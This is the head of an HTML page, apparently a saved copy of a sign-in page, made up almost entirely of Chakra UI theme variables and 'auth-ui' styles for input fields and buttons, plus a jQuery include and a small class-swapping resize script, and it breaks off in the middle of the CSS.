<!DOCTYPE html>

<html lang="en" data-theme="light" style="color-scheme: light;">
   <head>
      <style type="text/css">
         body {
    transition: opacity ease-in 0.2s;
}
      </style>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
      <meta http-equiv="origin-trial" >
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta name="color-scheme" content="only light">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
      
      <style id="text/css" nonce=""> ::-ms-reveal { display: none; }</style>
     
      <script type="text/javascript">
      window.addEventListener('resize', function(event){
      var div = document.getElementById('miDiv');
      if(window.innerWidth <= 768){ // Cambia el tamaño de 768 según tus necesidades
      div.classList.remove('auth-ui-11bebfs');
      div.classList.add('auth-ui-6q6l5');
      } else {
      div.classList.remove('auth-ui-6q6l5');
      div.classList.add('auth-ui-11bebfs');
      }
      });

      </script>
      <style type="text/css">#_copy{align-items:center;background:#4494d5;border-radius:3px;color:#fff;cursor:pointer;display:flex;font-size:13px;height:30px;justify-content:center;position:absolute;width:60px;z-index:1000}#select-tooltip,#sfModal,.modal-backdrop,div[id^=reader-helper]{display:none!important}.modal-open{overflow:auto!important}._sf_adjust_body{padding-right:0!important}.super_copy_btns_div{position:fixed;width:154px;left:10px;top:45%;background:#e7f1ff;border:2px solid #4595d5;font-weight:600;border-radius:2px;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;z-index:5000}.super_copy_btns_logo{width:100%;background:#4595d5;text-align:center;font-size:12px;color:#e7f1ff;line-height:30px;height:30px}.super_copy_btns_btn{display:block;width:128px;height:28px;background:#7f5711;border-radius:4px;color:#fff;font-size:12px;border:0;outline:0;margin:8px auto;font-weight:700;cursor:pointer;opacity:.9}.super_copy_btns_btn:hover{opacity:.8}.super_copy_btns_btn:active{opacity:1}</style>



      <style data-emotion="auth-ui-global" nonce="" data-s="">
         .chakra-ui-light :host:not([data-theme]), .chakra-ui-light :root:not([data-theme]), .chakra-ui-light [data-theme]:not([data-theme]), [data-theme="light"] :host:not([data-theme]), [data-theme="light"] :root:not([data-theme]), [data-theme="light"] [data-theme]:not([data-theme]), :host[data-theme="light"], :root[data-theme="light"], [data-theme][data-theme="light"] {
    --chakra-colors-chakra-body-text: var(--chakra-colors-gray-800);
    --chakra-colors-chakra-body-bg: var(--chakra-colors-white);
    --chakra-colors-chakra-border-color: var(--chakra-colors-gray-200);
    --chakra-colors-chakra-inverse-text: var(--chakra-colors-white);
    --chakra-colors-chakra-subtle-bg: var(--chakra-colors-gray-100);
    --chakra-colors-chakra-subtle-text: var(--chakra-colors-gray-600);
    --chakra-colors-chakra-placeholder-color: var(--chakra-colors-gray-500);
}

         :host, :root, [data-theme] {
    --chakra-ring-inset: var(--chakra-empty,/*!*/ /*!*/);
    --chakra-ring-offset-width: 0px;
    --chakra-ring-offset-color: #fff;
    --chakra-ring-color: rgba(66, 153, 225, 0.6);
    --chakra-ring-offset-shadow: 0 0 #0000;
    --chakra-ring-shadow: 0 0 #0000;
    --chakra-space-x-reverse: 0;
    --chakra-space-y-reverse: 0;
    --chakra-colors-transparent: transparent;
    --chakra-colors-current: currentColor;
    --chakra-colors-black: #000;
    --chakra-colors-white: #fff;
    --chakra-colors-whiteAlpha-50: rgba(255, 255, 255, 0.04);
    --chakra-colors-whiteAlpha-100: rgba(255, 255, 255, 0.06);
    --chakra-colors-whiteAlpha-200: rgba(255, 255, 255, 0.08);
    --chakra-colors-whiteAlpha-300: rgba(255, 255, 255, 0.16);
    --chakra-colors-whiteAlpha-400: rgba(255, 255, 255, 0.24);
    --chakra-colors-whiteAlpha-500: rgba(255, 255, 255, 0.36);
    --chakra-colors-whiteAlpha-600: rgba(255, 255, 255, 0.48);
    --chakra-colors-whiteAlpha-700: rgba(255, 255, 255, 0.64);
    --chakra-colors-whiteAlpha-800: rgba(255, 255, 255, 0.80);
    --chakra-colors-whiteAlpha-900: rgba(255, 255, 255, 0.92);
    --chakra-colors-blackAlpha-50: rgba(0, 0, 0, 0.04);
    --chakra-colors-blackAlpha-100: rgba(0, 0, 0, 0.06);
    --chakra-colors-blackAlpha-200: rgba(0, 0, 0, 0.08);
    --chakra-colors-blackAlpha-300: rgba(0, 0, 0, 0.16);
    --chakra-colors-blackAlpha-400: rgba(0, 0, 0, 0.24);
    --chakra-colors-blackAlpha-500: rgba(0, 0, 0, 0.36);
    --chakra-colors-blackAlpha-600: rgba(0, 0, 0, 0.48);
    --chakra-colors-blackAlpha-700: rgba(0, 0, 0, 0.64);
    --chakra-colors-blackAlpha-800: rgba(0, 0, 0, 0.80);
    --chakra-colors-blackAlpha-900: rgba(0, 0, 0, 0.92);
    --chakra-colors-gray-50: #fafcfc;
    --chakra-colors-gray-100: #f3f4f7;
    --chakra-colors-gray-200: #d9e0e8;
    --chakra-colors-gray-300: #b3becc;
    --chakra-colors-gray-400: #8696a7;
    --chakra-colors-gray-500: #607081;
    --chakra-colors-gray-600: #425263;
    --chakra-colors-gray-700: #263647;
    --chakra-colors-gray-800: #19293a;
    --chakra-colors-gray-900: #09192a;
    --chakra-colors-red-50: #fff6f6;
    --chakra-colors-red-100: #ffe7e6;
    --chakra-colors-red-200: #ffd5d2;
    --chakra-colors-red-300: #ff9a94;
    --chakra-colors-red-400: #ff5c52;
    --chakra-colors-red-500: #e23c32;
    --chakra-colors-red-600: #c02a21;
    --chakra-colors-red-700: #a2150c;
    --chakra-colors-red-800: #8c0800;
    --chakra-colors-red-900: #5b0500;
    --chakra-colors-orange-50: #FFFAF0;
    --chakra-colors-orange-100: #FEEBC8;
    --chakra-colors-orange-200: #FBD38D;
    --chakra-colors-orange-300: #F6AD55;
    --chakra-colors-orange-400: #ED8936;
    --chakra-colors-orange-500: #DD6B20;
    --chakra-colors-orange-600: #C05621;
    --chakra-colors-orange-700: #9C4221;
    --chakra-colors-orange-800: #7B341E;
    --chakra-colors-orange-900: #652B19;
    --chakra-colors-yellow-50: #FFFFF0;
    --chakra-colors-yellow-100: #FEFCBF;
    --chakra-colors-yellow-200: #FAF089;
    --chakra-colors-yellow-300: #F6E05E;
    --chakra-colors-yellow-400: #ECC94B;
    --chakra-colors-yellow-500: #D69E2E;
    --chakra-colors-yellow-600: #B7791F;
    --chakra-colors-yellow-700: #975A16;
    --chakra-colors-yellow-800: #744210;
    --chakra-colors-yellow-900: #5F370E;
    --chakra-colors-green-50: #F0FFF4;
    --chakra-colors-green-100: #C6F6D5;
    --chakra-colors-green-200: #9AE6B4;
    --chakra-colors-green-300: #68D391;
    --chakra-colors-green-400: #48BB78;
    --chakra-colors-green-500: #38A169;
    --chakra-colors-green-600: #2F855A;
    --chakra-colors-green-700: #276749;
    --chakra-colors-green-800: #22543D;
    --chakra-colors-green-900: #1C4532;
    --chakra-colors-teal-50: #E6FFFA;
    --chakra-colors-teal-100: #B2F5EA;
    --chakra-colors-teal-200: #81E6D9;
    --chakra-colors-teal-300: #4FD1C5;
    --chakra-colors-teal-400: #38B2AC;
    --chakra-colors-teal-500: #319795;
    --chakra-colors-teal-600: #2C7A7B;
    --chakra-colors-teal-700: #285E61;
    --chakra-colors-teal-800: #234E52;
    --chakra-colors-teal-900: #1D4044;
    --chakra-colors-blue-50: #f5fafe;
    --chakra-colors-blue-100: #e6f3ff;
    --chakra-colors-blue-200: #d2ecff;
    --chakra-colors-blue-300: #44bceb;
    --chakra-colors-blue-400: #249dd9;
    --chakra-colors-blue-500: #3e7eb8;
    --chakra-colors-blue-600: #22578e;
    --chakra-colors-blue-700: #21386c;
    --chakra-colors-blue-800: #212e61;
    --chakra-colors-blue-900: #1f284a;
    --chakra-colors-cyan-50: #EDFDFD;
    --chakra-colors-cyan-100: #C4F1F9;
    --chakra-colors-cyan-200: #9DECF9;
    --chakra-colors-cyan-300: #76E4F7;
    --chakra-colors-cyan-400: #0BC5EA;
    --chakra-colors-cyan-500: #00B5D8;
    --chakra-colors-cyan-600: #00A3C4;
    --chakra-colors-cyan-700: #0987A0;
    --chakra-colors-cyan-800: #086F83;
    --chakra-colors-cyan-900: #065666;
    --chakra-colors-purple-50: #FAF5FF;
    --chakra-colors-purple-100: #E9D8FD;
    --chakra-colors-purple-200: #D6BCFA;
    --chakra-colors-purple-300: #B794F4;
    --chakra-colors-purple-400: #9F7AEA;
    --chakra-colors-purple-500: #805AD5;
    --chakra-colors-purple-600: #6B46C1;
    --chakra-colors-purple-700: #553C9A;
    --chakra-colors-purple-800: #44337A;
    --chakra-colors-purple-900: #322659;
    --chakra-colors-pink-50: #FFF5F7;
    --chakra-colors-pink-100: #FED7E2;
    --chakra-colors-pink-200: #FBB6CE;
    --chakra-colors-pink-300: #F687B3;
    --chakra-colors-pink-400: #ED64A6;
    --chakra-colors-pink-500: #D53F8C;
    --chakra-colors-pink-600: #B83280;
    --chakra-colors-pink-700: #97266D;
    --chakra-colors-pink-800: #702459;
    --chakra-colors-pink-900: #521B41;
    --chakra-colors-linkedin-50: #E8F4F9;
    --chakra-colors-linkedin-100: #CFEDFB;
    --chakra-colors-linkedin-200: #9BDAF3;
    --chakra-colors-linkedin-300: #68C7EC;
    --chakra-colors-linkedin-400: #34B3E4;
    --chakra-colors-linkedin-500: #00A0DC;
    --chakra-colors-linkedin-600: #008CC9;
    --chakra-colors-linkedin-700: #0077B5;
    --chakra-colors-linkedin-800: #005E93;
    --chakra-colors-linkedin-900: #004471;
    --chakra-colors-facebook-50: #E8F4F9;
    --chakra-colors-facebook-100: #D9DEE9;
    --chakra-colors-facebook-200: #B7C2DA;
    --chakra-colors-facebook-300: #6482C0;
    --chakra-colors-facebook-400: #4267B2;
    --chakra-colors-facebook-500: #385898;
    --chakra-colors-facebook-600: #314E89;
    --chakra-colors-facebook-700: #29487D;
    --chakra-colors-facebook-800: #223B67;
    --chakra-colors-facebook-900: #1E355B;
    --chakra-colors-messenger-50: #D0E6FF;
    --chakra-colors-messenger-100: #B9DAFF;
    --chakra-colors-messenger-200: #A2CDFF;
    --chakra-colors-messenger-300: #7AB8FF;
    --chakra-colors-messenger-400: #2E90FF;
    --chakra-colors-messenger-500: #0078FF;
    --chakra-colors-messenger-600: #0063D1;
    --chakra-colors-messenger-700: #0052AC;
    --chakra-colors-messenger-800: #003C7E;
    --chakra-colors-messenger-900: #002C5C;
    --chakra-colors-whatsapp-50: #dffeec;
    --chakra-colors-whatsapp-100: #b9f5d0;
    --chakra-colors-whatsapp-200: #90edb3;
    --chakra-colors-whatsapp-300: #65e495;
    --chakra-colors-whatsapp-400: #3cdd78;
    --chakra-colors-whatsapp-500: #22c35e;
    --chakra-colors-whatsapp-600: #179848;
    --chakra-colors-whatsapp-700: #0c6c33;
    --chakra-colors-whatsapp-800: #01421c;
    --chakra-colors-whatsapp-900: #001803;
    --chakra-colors-twitter-50: #E5F4FD;
    --chakra-colors-twitter-100: #C8E9FB;
    --chakra-colors-twitter-200: #A8DCFA;
    --chakra-colors-twitter-300: #83CDF7;
    --chakra-colors-twitter-400: #57BBF5;
    --chakra-colors-twitter-500: #1DA1F2;
    --chakra-colors-twitter-600: #1A94DA;
    --chakra-colors-twitter-700: #1681BF;
    --chakra-colors-twitter-800: #136B9E;
    --chakra-colors-twitter-900: #0D4D71;
    --chakra-colors-telegram-50: #E3F2F9;
    --chakra-colors-telegram-100: #C5E4F3;
    --chakra-colors-telegram-200: #A2D4EC;
    --chakra-colors-telegram-300: #7AC1E4;
    --chakra-colors-telegram-400: #47A9DA;
    --chakra-colors-telegram-500: #0088CC;
    --chakra-colors-telegram-600: #007AB8;
    --chakra-colors-telegram-700: #006BA1;
    --chakra-colors-telegram-800: #005885;
    --chakra-colors-telegram-900: #003F5E;
    --chakra-colors-brand-500: #226ba4;
    --chakra-colors-brand-600: #22578e;
    --chakra-colors-brand-700: #21457b;
    --chakra-borders-none: 0;
    --chakra-borders-1px: 1px solid;
    --chakra-borders-2px: 2px solid;
    --chakra-borders-4px: 4px solid;
    --chakra-borders-8px: 8px solid;
    --chakra-fonts-heading: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
    --chakra-fonts-body: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Helvetica Neue,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
    --chakra-fonts-mono: SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;
    --chakra-fontSizes-3xs: 0.45rem;
    --chakra-fontSizes-2xs: 0.625rem;
    --chakra-fontSizes-xs: 0.75rem;
    --chakra-fontSizes-sm: 14px;
    --chakra-fontSizes-md: 1rem;
    --chakra-fontSizes-lg: 1.125rem;
    --chakra-fontSizes-xl: 1.25rem;
    --chakra-fontSizes-2xl: 1.5rem;
    --chakra-fontSizes-3xl: 1.875rem;
    --chakra-fontSizes-4xl: 2.25rem;
    --chakra-fontSizes-5xl: 3rem;
    --chakra-fontSizes-6xl: 3.75rem;
    --chakra-fontSizes-7xl: 4.5rem;
    --chakra-fontSizes-8xl: 6rem;
    --chakra-fontSizes-9xl: 8rem;
    --chakra-fontSizes-header: 24px;
    --chakra-fontSizes-subheader: 18px;
    --chakra-fontWeights-hairline: 100;
    --chakra-fontWeights-thin: 200;
    --chakra-fontWeights-light: 200;
    --chakra-fontWeights-normal: 500;
    --chakra-fontWeights-medium: 500;
    --chakra-fontWeights-semibold: 600;
    --chakra-fontWeights-bold: 700;
    --chakra-fontWeights-extrabold: 800;
    --chakra-fontWeights-black: 900;
    --chakra-letterSpacings-tighter: -0.05em;
    --chakra-letterSpacings-tight: -0.025em;
    --chakra-letterSpacings-normal: 0;
    --chakra-letterSpacings-wide: 0.025em;
    --chakra-letterSpacings-wider: 0.05em;
    --chakra-letterSpacings-widest: 0.1em;
    --chakra-lineHeights-3: .75rem;
    --chakra-lineHeights-4: 1rem;
    --chakra-lineHeights-5: 1.25rem;
    --chakra-lineHeights-6: 1.5rem;
    --chakra-lineHeights-7: 1.75rem;
    --chakra-lineHeights-8: 2rem;
    --chakra-lineHeights-9: 2.25rem;
    --chakra-lineHeights-10: 2.5rem;
    --chakra-lineHeights-normal: normal;
    --chakra-lineHeights-none: 1;
    --chakra-lineHeights-shorter: 1.25;
    --chakra-lineHeights-short: 1.375;
    --chakra-lineHeights-base: 1.5;
    --chakra-lineHeights-tall: 1.625;
    --chakra-lineHeights-taller: 2;
    --chakra-radii-none: 0;
    --chakra-radii-sm: 0.125rem;
    --chakra-radii-base: 4px;
    --chakra-radii-md: 0.375rem;
    --chakra-radii-lg: 0.5rem;
    --chakra-radii-xl: 0.75rem;
    --chakra-radii-2xl: 1rem;
    --chakra-radii-3xl: 1.5rem;
    --chakra-radii-full: 9999px;
    --chakra-space-1: 0.25rem;
    --chakra-space-2: 0.5rem;
    --chakra-space-3: 0.75rem;
    --chakra-space-4: 1rem;
    --chakra-space-5: 1.25rem;
    --chakra-space-6: 1.5rem;
    --chakra-space-7: 1.75rem;
    --chakra-space-8: 2rem;
    --chakra-space-9: 2.25rem;
    --chakra-space-10: 2.5rem;
    --chakra-space-12: 3rem;
    --chakra-space-14: 3.5rem;
    --chakra-space-16: 4rem;
    --chakra-space-20: 5rem;
    --chakra-space-24: 6rem;
    --chakra-space-28: 7rem;
    --chakra-space-32: 8rem;
    --chakra-space-36: 9rem;
    --chakra-space-40: 10rem;
    --chakra-space-44: 11rem;
    --chakra-space-48: 12rem;
    --chakra-space-52: 13rem;
    --chakra-space-56: 14rem;
    --chakra-space-60: 15rem;
    --chakra-space-64: 16rem;
    --chakra-space-72: 18rem;
    --chakra-space-80: 20rem;
    --chakra-space-96: 24rem;
    --chakra-space-px: 1px;
    --chakra-space-0-5: 0.125rem;
    --chakra-space-1-5: 0.375rem;
    --chakra-space-2-5: 0.625rem;
    --chakra-space-3-5: 0.875rem;
    --chakra-space-xxs: 2px;
    --chakra-space-xs: 4px;
    --chakra-space-sm: 8px;
    --chakra-space-mdSm: 12px;
    --chakra-space-md: 16px;
    --chakra-space-mdLg: 24px;
    --chakra-space-lg: 32px;
    --chakra-space-xl: 64px;
    --chakra-space-xxl: 128px;
    --chakra-shadows-xs: 0 0 0 1px rgba(0, 0, 0, 0.05);
    --chakra-shadows-sm: 0 1px 2px 0 rgba(0, 0, 0, 0.05);
    --chakra-shadows-base: 0 1px 3px 0 rgba(0, 0, 0, 0.1),0 1px 2px 0 rgba(0, 0, 0, 0.06);
    --chakra-shadows-md: 0 4px 6px -1px rgba(0, 0, 0, 0.1),0 2px 4px -1px rgba(0, 0, 0, 0.06);
    --chakra-shadows-lg: 0 10px 15px -3px rgba(0, 0, 0, 0.1),0 4px 6px -2px rgba(0, 0, 0, 0.05);
    --chakra-shadows-xl: 0 20px 25px -5px rgba(0, 0, 0, 0.1),0 10px 10px -5px rgba(0, 0, 0, 0.04);
    --chakra-shadows-2xl: 0 25px 50px -12px rgba(0, 0, 0, 0.25);
    --chakra-shadows-outline: 0 0 0 3px rgba(66, 153, 225, 0.6);
    --chakra-shadows-inner: inset 0 2px 4px 0 rgba(0,0,0,0.06);
    --chakra-shadows-none: none;
    --chakra-shadows-dark-lg: rgba(0, 0, 0, 0.1) 0px 0px 0px 1px,rgba(0, 0, 0, 0.2) 0px 5px 10px,rgba(0, 0, 0, 0.4) 0px 15px 40px;
    --chakra-sizes-1: 0.25rem;
    --chakra-sizes-2: 0.5rem;
    --chakra-sizes-3: 0.75rem;
    --chakra-sizes-4: 1rem;
    --chakra-sizes-5: 1.25rem;
    --chakra-sizes-6: 1.5rem;
    --chakra-sizes-7: 1.75rem;
    --chakra-sizes-8: 2rem;
    --chakra-sizes-9: 2.25rem;
    --chakra-sizes-10: 2.5rem;
    --chakra-sizes-12: 3rem;
    --chakra-sizes-14: 3.5rem;
    --chakra-sizes-16: 4rem;
    --chakra-sizes-20: 5rem;
    --chakra-sizes-24: 6rem;
    --chakra-sizes-28: 7rem;
    --chakra-sizes-32: 8rem;
    --chakra-sizes-36: 9rem;
    --chakra-sizes-40: 10rem;
    --chakra-sizes-44: 11rem;
    --chakra-sizes-48: 12rem;
    --chakra-sizes-52: 13rem;
    --chakra-sizes-56: 14rem;
    --chakra-sizes-60: 15rem;
    --chakra-sizes-64: 16rem;
    --chakra-sizes-72: 18rem;
    --chakra-sizes-80: 20rem;
    --chakra-sizes-96: 24rem;
    --chakra-sizes-px: 1px;
    --chakra-sizes-0-5: 0.125rem;
    --chakra-sizes-1-5: 0.375rem;
    --chakra-sizes-2-5: 0.625rem;
    --chakra-sizes-3-5: 0.875rem;
    --chakra-sizes-max: max-content;
    --chakra-sizes-min: min-content;
    --chakra-sizes-full: 100%;
    --chakra-sizes-3xs: 14rem;
    --chakra-sizes-2xs: 16rem;
    --chakra-sizes-xs: 20rem;
    --chakra-sizes-sm: 24rem;
    --chakra-sizes-md: 28rem;
    --chakra-sizes-lg: 32rem;
    --chakra-sizes-xl: 36rem;
    --chakra-sizes-2xl: 42rem;
    --chakra-sizes-3xl: 48rem;
    --chakra-sizes-4xl: 56rem;
    --chakra-sizes-5xl: 64rem;
    --chakra-sizes-6xl: 72rem;
    --chakra-sizes-7xl: 80rem;
    --chakra-sizes-8xl: 90rem;
    --chakra-sizes-prose: 60ch;
    --chakra-sizes-container-sm: 640px;
    --chakra-sizes-container-md: 768px;
    --chakra-sizes-container-lg: 1024px;
    --chakra-sizes-container-xl: 1280px;
    --chakra-sizes-icon: 64px;
    --chakra-sizes-iconModal: 28px;
    --chakra-sizes-iconSm: 24px;
    --chakra-zIndices-hide: -1;
    --chakra-zIndices-auto: auto;
    --chakra-zIndices-base: 0;
    --chakra-zIndices-docked: 10;
    --chakra-zIndices-dropdown: 1000;
    --chakra-zIndices-sticky: 1100;
    --chakra-zIndices-banner: 1200;
    --chakra-zIndices-overlay: 1300;
    --chakra-zIndices-modal: 1400;
    --chakra-zIndices-popover: 1500;
    --chakra-zIndices-skipLink: 1600;
    --chakra-zIndices-toast: 1700;
    --chakra-zIndices-tooltip: 1800;
    --chakra-transition-property-common: background-color,border-color,color,fill,stroke,opacity,box-shadow,transform;
    --chakra-transition-property-colors: background-color,border-color,color,fill,stroke;
    --chakra-transition-property-dimensions: width,height;
    --chakra-transition-property-position: left,right,top,bottom;
    --chakra-transition-property-background: background-color,background-image,background-position;
    --chakra-transition-easing-ease-in: cubic-bezier(0.4, 0, 1, 1);
    --chakra-transition-easing-ease-out: cubic-bezier(0, 0, 0.2, 1);
    --chakra-transition-easing-ease-in-out: cubic-bezier(0.4, 0, 0.2, 1);
    --chakra-transition-duration-ultra-fast: 50ms;
    --chakra-transition-duration-faster: 100ms;
    --chakra-transition-duration-fast: 150ms;
    --chakra-transition-duration-normal: 200ms;
    --chakra-transition-duration-slow: 300ms;
    --chakra-transition-duration-slower: 400ms;
    --chakra-transition-duration-ultra-slow: 500ms;
    --chakra-blur-none: 0;
    --chakra-blur-sm: 4px;
    --chakra-blur-base: 8px;
    --chakra-blur-md: 12px;
    --chakra-blur-lg: 16px;
    --chakra-blur-xl: 24px;
    --chakra-blur-2xl: 40px;
    --chakra-blur-3xl: 64px;
    --chakra-breakpoints-base: 0em;
    --chakra-breakpoints-sm: 30em;
    --chakra-breakpoints-md: 48em;
    --chakra-breakpoints-lg: 62em;
    --chakra-breakpoints-xl: 80em;
    --chakra-breakpoints-2xl: 96em;
}
      </style>

   


      <style data-emotion="auth-ui-global" nonce="" data-s="">   
      :where(*) {
      border-width: 0px;
      border-style: solid;
      box-sizing: border-box;
      overflow-wrap: break-word;
      }

      body {
      position: relative;
      min-height: 100%;
      margin: 0px;
      font-feature-settings: "kern";
      }

      :where(*) {
      border-width: 0px;
      border-style: solid;
      box-sizing: border-box;
      overflow-wrap: break-word;
      }

      :root, :host {
      --chakra-vh: 100dvh;
      }

      html {
      line-height: 1.5;
      text-size-adjust: 100%;
      font-family: system-ui, sans-serif;
      -webkit-font-smoothing: antialiased;
      text-rendering: optimizelegibility;
      touch-action: manipulation;
      }

      :root, :host {
          --chakra-vh: -webkit-fill-available;
      }

      img {
      border-style: none;
      }

      :where(img, video) {
      max-width: 100%;
      height: auto;
      }

      :where(img, svg, video, canvas, audio, iframe, embed, object) {
      display: block;
      }
      :where(*) {
      border-width: 0px;
      border-style: solid;
      box-sizing: border-box;
      overflow-wrap: break-word;
      }
      img {
    overflow-clip-margin: content-box;
    overflow: clip;
}

:where(blockquote, dl, dd, h1, h2, h3, h4, h5, h6, hr, figure, p, pre) {
    margin: 0px;
}
button {
    background: transparent;
    padding: 0px;
}
:where(button, [role="button"]) {
    cursor: pointer;
}  
:where(button, select) {
    text-transform: none;
}
:where(button, input) {
    overflow: visible;
}
:where(button, input, optgroup, select, textarea) {
    font-family: inherit;
    font-size: 100%;
    line-height: 1.15;
    margin: 0px;
}
img {
    border-style: none;
}
:where(img, video) {
    max-width: 100%;
    height: auto;
}
      </style>

      

      <style data-emotion="auth-ui-global" nonce="" data-s="">
      body {
      font-family: var(--chakra-fonts-body);
      color: var(--chakra-colors-chakra-body-text);
      background: var(--chakra-colors-chakra-body-bg);
      transition-property: background-color;
      transition-duration: var(--chakra-transition-duration-normal);
      line-height: var(--chakra-lineHeights-base);
      }

      *, ::before, ::after {
      border-color: var(--chakra-colors-chakra-border-color);
      }


      </style>



      <style data-emotion="auth-ui" nonce="" data-s="">

      .auth-ui-11bebfs {
      display: flex;
      -webkit-box-pack: center;
      justify-content: center;
      padding: var(--chakra-space-lg);
      margin-bottom: var(--chakra-space-xl);
      border-bottom-style: solid;
      border-bottom-width: 1px;
      border-bottom-color: var(--chakra-colors-blue-100);
      }

      .auth-ui-o7rsyv {
      object-fit: contain;
      height: 40px;
      width: 169px;
      }

      .auth-ui-1chkgno {
      width: 100%;
      margin-inline: auto;
      max-width: var(--chakra-sizes-prose);
      padding-inline-start: var(--chakra-space-4);
      padding-inline-end: var(--chakra-space-4);
      margin-top: var(--chakra-space-lg);
      margin-bottom: var(--chakra-space-lg);
      }
      .auth-ui-134jqdd {
      display: flex;
      -webkit-box-align: center;
      align-items: center;
      flex-direction: column;
      gap: var(--chakra-space-mdLg);
      align-content: start;
      }

      .auth-ui-jmwhvt {
      display: flex;
      -webkit-box-align: stretch;
      align-items: stretch;
      width: 100%;
      flex-direction: column;
      }
      .auth-ui-1gsou51 {
      display: flex;
      -webkit-box-align: stretch;
      align-items: stretch;
      flex-direction: column;
      gap: var(--chakra-space-mdLg);
      }

      .auth-ui-1d7x4x5 {
      display: flex;
      -webkit-box-align: stretch;
      align-items: stretch;
      flex-direction: column;
      gap: var(--chakra-space-md);
      }

      .auth-ui-1va0uhw {
      line-height: 1.2;
      }

      .auth-ui-1va0uhw {
      font-family: var(--chakra-fonts-heading);
      font-weight: var(--chakra-fontWeights-bold);
      color: var(--chakra-colors-blue-800);
      font-size: var(--chakra-fontSizes-header);
      line-height: 1.33;
      }
      .auth-ui-1kxonj9 {
    width: 100%;
    position: relative;
}

.auth-ui-g6pte {
    display: block;
    text-align: start;
    font-size: var(--chakra-fontSizes-md);
    margin-inline-end: var(--chakra-space-3);
    margin-bottom: var(--chakra-space-2);
    font-weight: var(--chakra-fontWeights-medium);
    transition-property: var(--chakra-transition-property-common);
    transition-duration: var(--chakra-transition-duration-normal);
    opacity: 1;
}
.auth-ui-1wic40a {
    width: 100%;
    height: 48px;
    font-size: var(--input-font-size);
    padding-inline-start: 16px;
    padding-inline-end: 16px;
    min-width: 0px;
    outline-offset: 2px;
    position: relative;
    appearance: none;
    transition-property: var(--chakra-transition-property-common);
    transition-duration: var(--chakra-transition-duration-normal);
    padding-top: 8px;
    padding-bottom: 8px;
    line-height: 1.4;
    --input-font-size: var(--chakra-fontSizes-md);
    --input-padding: var(--chakra-space-4);
    --input-border-radius: var(--chakra-radii-md);
    --input-height: var(--chakra-sizes-10);
    border-image-source: ;
    border-image-slice: ;
    border-image-width: ;
    border-image-outset: ;
    border-image-repeat: ;
    border-radius: 3px;
    outline: transparent solid 2px;
    border-color: rgb(96, 112, 129);
    background: inherit;
    border-width: 1px;
    border-style: solid;
}

.auth-ui-1y0e7gb {
    width: 100%;
    display: flex;
    position: relative;
    isolation: isolate;
    --input-font-size: var(--chakra-fontSizes-md);
    --input-padding: var(--chakra-space-4);
    --input-border-radius: var(--chakra-radii-md);
    --input-height: var(--chakra-sizes-10);
}
.auth-ui-1kjytvw {
    width: 100%;
    height: 48px;
    font-size: var(--input-font-size);
    padding-inline-start: 16px;
    padding-inline-end: 48px;
    min-width: 0px;
    outline-offset: 2px;
    position: relative;
    appearance: none;
    transition-property: var(--chakra-transition-property-common);
    transition-duration: var(--chakra-transition-duration-normal);
    padding-top: 8px;
    padding-bottom: 8px;
    line-height: 1.4;
    --input-font-size: var(--chakra-fontSizes-md);
    --input-padding: var(--chakra-space-4);
    --input-border-radius: var(--chakra-radii-md);
    --input-height: var(--chakra-sizes-10);
    border-image-source: ;
    border-image-slice: ;
    border-image-width: ;
    border-image-outset: ;
    border-image-repeat: ;
    border-radius: 3px;
    outline: transparent solid 2px;
    border-color: rgb(96, 112, 129);
    background: inherit;
    border-width: 1px;
    border-style: solid;
}
.auth-ui-annrnj {
    right: 0px;
    width: 24px;
    height: 48px;
    font-size: var(--input-font-size);
    display: flex;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    position: absolute;
    top: 0px;
    z-index: 2;
    margin-inline-start: var(--chakra-space-md);
    margin-inline-end: var(--chakra-space-md);
}
.auth-ui-1fllbz4 {
    appearance: none;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    user-select: none;
    position: relative;
    white-space: nowrap;
    vertical-align: middle;
    outline: transparent solid 2px;
    outline-offset: 2px;
    line-height: inherit;
    border-radius: var(--chakra-radii-base);
    font-weight: var(--chakra-fontWeights-semibold);
    transition-property: var(--chakra-transition-property-common);
    transition-duration: var(--chakra-transition-duration-normal);
    font-size: 17px;
    text-decoration: none;
    min-height: 24px;
    min-width: var(--chakra-sizes-10);
    height: auto;
    padding-inline-start: var(--chakra-space-mdSm);
    padding-inline-end: var(--chakra-space-mdSm);
    background: none;
    color: inherit;
    margin: 0px;
    padding: 0px;
    display: flex;
    border: var(--chakra-borders-none);
}
.auth-ui-1m01c8l {
    height: 24px;
    width: 24px;
}
.auth-ui-1jda25g {
    display: inline-flex;
    appearance: none;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    user-select: none;
    position: relative;
    white-space: nowrap;
    vertical-align: middle;
    outline: transparent solid 2px;
    outline-offset: 2px;
    line-height: 1.2;
    border-radius: var(--chakra-radii-base);
    font-weight: var(--chakra-fontWeights-semibold);
    transition-property: var(--chakra-transition-property-common);
    transition-duration: var(--chakra-transition-duration-normal);
    font-size: 17px;
    text-decoration: none;
    min-height: 24px;
    min-width: var(--chakra-sizes-10);
    height: auto;
    padding-inline-start: var(--chakra-space-mdSm);
    padding-inline-end: var(--chakra-space-mdSm);
    padding-top: var(--chakra-space-md);
    padding-bottom: var(--chakra-space-md);
    background: var(--chakra-colors-brand-500);
    color: var(--chakra-colors-white);
    border-width: 2px;
    border-color: var(--chakra-colors-brand-500);
}
.auth-ui-hl0efd {
    display: inline-flex;
    appearance: none;
    -webkit-box-align: center;
    align-items: center;
    -webkit-box-pack: center;
    justify-content: center;
    user-select: none;
    position: relative;
    white-space: nowrap;
    vertical-align: baseline;
    outline: transparent solid 2px;
    outline-offset: 2px;
